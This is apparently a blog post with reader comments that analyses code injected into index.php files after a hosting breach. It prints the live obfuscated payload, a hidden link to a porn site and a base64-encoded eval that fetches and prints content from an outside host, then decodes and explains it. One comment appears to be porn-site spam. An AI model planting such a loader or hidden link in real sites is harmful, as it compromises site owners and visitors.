As we talked about last time, Media Temple’s servers got cracked, and many people’s passwords were stolen. In addition, many codes were added to people’s files. According to Jeffrey Barke, there were codes injected in index.php, and while there were codes injected in other parts of the site, I’d like to take a look at index.php’s code:
<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>
Firstly, this isn’t much of an ‘analysis’, as the code is pretty straightforward (once you decode the Base64 encryption, so don’t expect
Now, the first thing you’ll notice is that nice strand tag that the cracker used. It’s embedded as an HTML comment, but each code that has has the exact same code underneath. There are multiple strands, and they all do different things… but they have the same basic code. Some strands put in links to scam sites, porn sites, and malware sites… but most just happened to be porn. So above, you’ll see a link going to a porn site that he cracker fancies, which is obnoxious… but isn’t a problem, really.
Let’s look at the PHP code though, that looks interesting. What is it? The eval language construct basically just tells the PHP engine to do whatever is inside the parentheses. But what’s all that crap inside of the parentheses? Well, it looks like that because it’s encoded in Base64. Now, let’s decode it, and put it into plaintext. I’ve indented the code below, and prettied it up a bit, for readability.
$l = "http://tourreviews.asia/links2/link.php";
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l);
$r = curl_exec($ch);
curl_close($ch);
} else {
$r = implode("", file($l));
}
print @$r;
Now, I’ll comment each and every line, so that we can see what it really means. One of the best ways of learning to code is reading other people’s code, so we’ll utilize this as an educational opportunity.
$l = "http://tourreviews.asia/links2/link.php"; //Declare URL.
if (extension_loaded("curl")) { //If the cURL extension is enabled...
$ch = curl_init(); //Start a cURL session (using $ch as our cURL handle)
curl_setopt($ch, CURLOPT_TIMEOUT, 30); //30 second timeout on connection.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Return the webpage.
curl_setopt($ch, CURLOPT_URL, $l); //Set our URL as the URL to use.
$r = curl_exec($ch); //Do it!
curl_close($ch); //Close it, and free up the memory.
} else { //Otherwise, if we can't use cURL...
$r = implode("", file($l)); //Get the file as an array, and stick it back together.
}
print @$r; //Print whatever we've got, but don't give us any errors.
So the first part of the code isn’t too harmful… it’s just a link. But this second part downloads the entire page, and displays it on your website. That is definitely not good. However, if you were affected, don’t worry… the fix seems to be relatively simple.
Nicely commented. A good follow up story would be to explain what the attacker did to inject this code into the multiple sites. Like maybe he wrote a script that would add the same code with various little changes into every index.php file… IF that is what he did.
While the official report hasn’t been made, I believe that roughly 10% of their accounts on their shared hosting servers were attacked.
It was initially believed to be a WordPress security flaw, but there were multiple CMS’s compromised in the attack, therefore it’s more likely that it’s a Media Temple issue, since nobody was attacked outside of their shared hosting.
My guess is that when Media Temple looks at their logs, they’re going to see tons of FTP connections from a remote machine, where it connects, uploads files, disconnects, and moves to the next account.
The problem is, how did they get all the FTP credentials?
Nice post!
Net porn is free pornography that is distributed by means of various sectors of the Internet, primarily via sites, p2p file sharing, or newsgroups. While porn had been traded over the Internet since the 1980s, it was the invention of the WWW in 1991 as well as the opening of the Net to the general public around the same time that led to an explosion in online porn.
Thanks lots, I’ve found this extremely good!